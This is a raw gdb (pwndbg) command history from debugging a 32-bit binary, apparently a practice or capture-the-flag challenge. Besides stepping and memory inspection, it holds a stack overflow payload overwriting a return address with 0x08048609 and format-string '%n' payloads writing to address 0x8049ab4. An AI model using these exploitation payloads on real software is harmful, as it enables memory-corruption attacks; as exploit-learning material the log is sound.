start
ni
start AAAA
ni
telescope 0xffffc8f0
telescope 0xffffc8f0 30
ni
x 0x8049ab4
x/10wx 0x8049ab4
ni
start A A A A A A A A A A A A A A A A A A A
ni
ni
ni
x 0x8049ab4
ni
set $eax=0x14
ni
si
ni
c
start
pdisass main
start
ni
start AAAA

ni
ni
ni
start AAAA
ni
ni
x 0x8049a84
x 0x8049a84+0x30
r
start AAAA
ni
ni
checksec 
ni
start AAAA B 
x 0x8049998
x/30wx 0x8049998
ni
b*0x080486de
r AAAA
r AAAAAAAA
ni
p 0xffffc8e0-0xffffcae0
p -0xffffc8e0+0xffffcae0
ni
start AAA
ni
start
start AAAA
ni
pdisass main
b*0x080486de
r
ni
p 0xffffcae0-0xffffc8e0
r < <(python -c 'from pwn import *;print "A"*0x200 + "B"*0xc + p32(0x08048609)')
r <(python -c 'from pwn import *;print "A"*0x200 + "B"*0xc + p32(0x08048609)')
r $(python -c 'from pwn import *;print "A"*0x200 + "B"*0xc + p32(0x08048609)')
ni
ni
r $(python -c 'from pwn import *;print "A"*0x200 + p32(0xffffc8c0) +"B"*8 + p32(0x08048609)')
ni
r $(python -c 'from pwn import *;print "A"*0x200 + p32(0xffffc8cc) +"B"*8 + p32(0x08048609)')
ni
start
start AAAA
ni
ni
star "%d\n"
start "%d\n"
ni
start
start AAAA
ni
telescope 0xffffc8d0
telescope 0xffffc8d0 40
start $(python -c 'print "\xb4\x9a\x04\x08" + "%n"')
ni
pdisass main
b*0x08048667
r $(python -c 'print "\xb4\x9a\x04\x08" + "%n"')
ni
ni
ni
b main
r $(python -c 'print "\xb4\x9a\x04\x08" + "a"*16  + "%n"')
ni
pdisass main
r
r AAAA
pdisass main
b*0x0804869d
r
 r AAAA
ni
shell cat format_string-write-up 
r < <(python -c 'print "\xb4\x9a\x04\x08" + "a"*16  + "%n"')
r `python -c 'print "\xb4\x9a\x04\x08" + "a"*16  + "%n"'`
ni
r
ls